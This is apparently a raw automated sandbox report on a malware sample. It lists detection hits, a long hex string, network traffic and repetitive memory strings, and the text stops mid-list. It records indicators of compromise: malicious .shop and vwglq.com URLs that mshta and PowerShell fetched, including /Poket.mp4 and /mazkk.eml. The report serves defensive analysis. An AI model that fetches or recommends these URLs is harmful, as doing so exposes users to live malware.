272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D0330D3F3E88BE2C45BB0C420751EC6D9A4B10B354AA
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7696, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://deduhko.klipzyroloo.shopAvira URL Cloud: Label: malware
Source: http://deduhko.klipzyroloo.shopAvira URL Cloud: Label: malware
Source: https://deduhko.klipzyroloo.shop/mazkk.emlAvira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.0% probability
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.144.62:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000006.00000002.2182040392.0000000000821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb+ source: powershell.exe, 00000006.00000002.2214556917.0000000006C9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb7 source: powershell.exe, 00000006.00000002.2214673362.0000000006CD3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbpV source: powershell.exe, 00000006.00000002.2182040392.00000000007B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb) source: powershell.exe, 00000006.00000002.2182040392.0000000000821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2214673362.0000000006CC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb. source: powershell.exe, 00000006.00000002.2213256401.0000000006C10000.00000004.00000020.00020000.00000000.sdmp
Source: global trafficHTTP traffic detected: GET /mazkk.eml HTTP/1.1Host: deduhko.klipzyroloo.shopConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: solve.vwglq.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Poket.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: deduhko2.kliphuwatey.shop
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /awjxs.captcha?u=6c079280-654d-44b7-add6-a7ba0821d64d HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: solve.vwglq.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Poket.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: deduhko2.kliphuwatey.shop
Source: global trafficHTTP traffic detected: GET /mazkk.eml HTTP/1.1Host: deduhko.klipzyroloo.shopConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: solve.vwglq.com
Source: global trafficDNS traffic detected: DNS query: deduhko2.kliphuwatey.shop
Source: global trafficDNS traffic detected: DNS query: deduhko.klipzyroloo.shop
Source: powershell.exe, 00000006.00000002.2182040392.000000000086A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftvu
Source: svchost.exe, 00000003.00000002.2901323035.0000026275800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000006.00000002.2183959871.0000000004A70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://deduhko.klipzyroloo.shop
Source: svchost.exe, 00000003.00000003.1696559513.0000026275A28000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1696559513.0000026275A28000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1696559513.0000026275A28000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1696559513.0000026275A5D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1849792547.000001E5E9796000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1849792547.000001E5E9654000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1667002839.0000018B8009D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811581786.000001E5D95E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2183959871.0000000004561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1667002839.0000018B80023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000000.00000002.1667002839.0000018B8006B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1811581786.000001E5D95E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.2183959871.0000000004561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2199485358.00000000055CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2214673362.0000000006CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko.kl
Source: powershell.exe, 00000006.00000002.2183959871.00000000046B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko.klipzyroloo.shop
Source: powershell.exe, 00000006.00000002.2182040392.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko.klipzyroloo.shop/mazkk.eml
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/
Source: mshta.exe, 00000002.00000003.1888626567.000001F822FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4
Source: mshta.exe, 00000002.00000003.1877520508.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1877800975.000001F821E6D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1895973024.000001F821E6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4...
Source: mshta.exe, 00000002.00000003.1878800373.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1893827664.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B4C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4...s
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4/
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp47
Source: mshta.exe, 00000002.00000002.1893827664.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878800373.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1886170270.000001F01B48E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp49280-654d-44b7-add6-a7ba0821d64d:
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4G
Source: mshta.exe, 00000002.00000002.1895547199.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1875575722.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1879974812.000001F8210F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1878062600.000001F8210F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4LMEMX
Source: mshta.exe, 00000002.00000003.1876192068.000001F01B48D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4RRC:
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4Y
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4_
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4g
Source: mshta.exe, 00000002.00000003.1888626567.000001F822FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4https://deduhko2.kliphuwatey.shop/Poket.mp4
Source: mshta.exe, 00000002.00000002.1894476182.000001F81D6E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4n
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888469749.000001F822FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://deduhko2.kliphuwatey.shop/Poket.mp4public
Source: mshta.exe, 00000002.00000003.1889195285.000001F822FFD000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889590451.000001F823005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888754132.000001F822FF7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889063925.000001F822FFA000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887904137.000001F822FF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889479003.000001F823003000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888185929.000001F822FF2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889271980.000001F822FFE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889447053.000001F823002000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889622801.000001F823007000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1887972960.000001F822FF1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889160464.000001F822FFC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888525631.000001F822FF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889553217.000001F823004000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888784854.000001F822FF8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889409060.000001F823001000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889099790.000001F822FFB000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1889336187.000001F822FFF000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888341622.000001F822FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1888981789.000001F822FF9000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 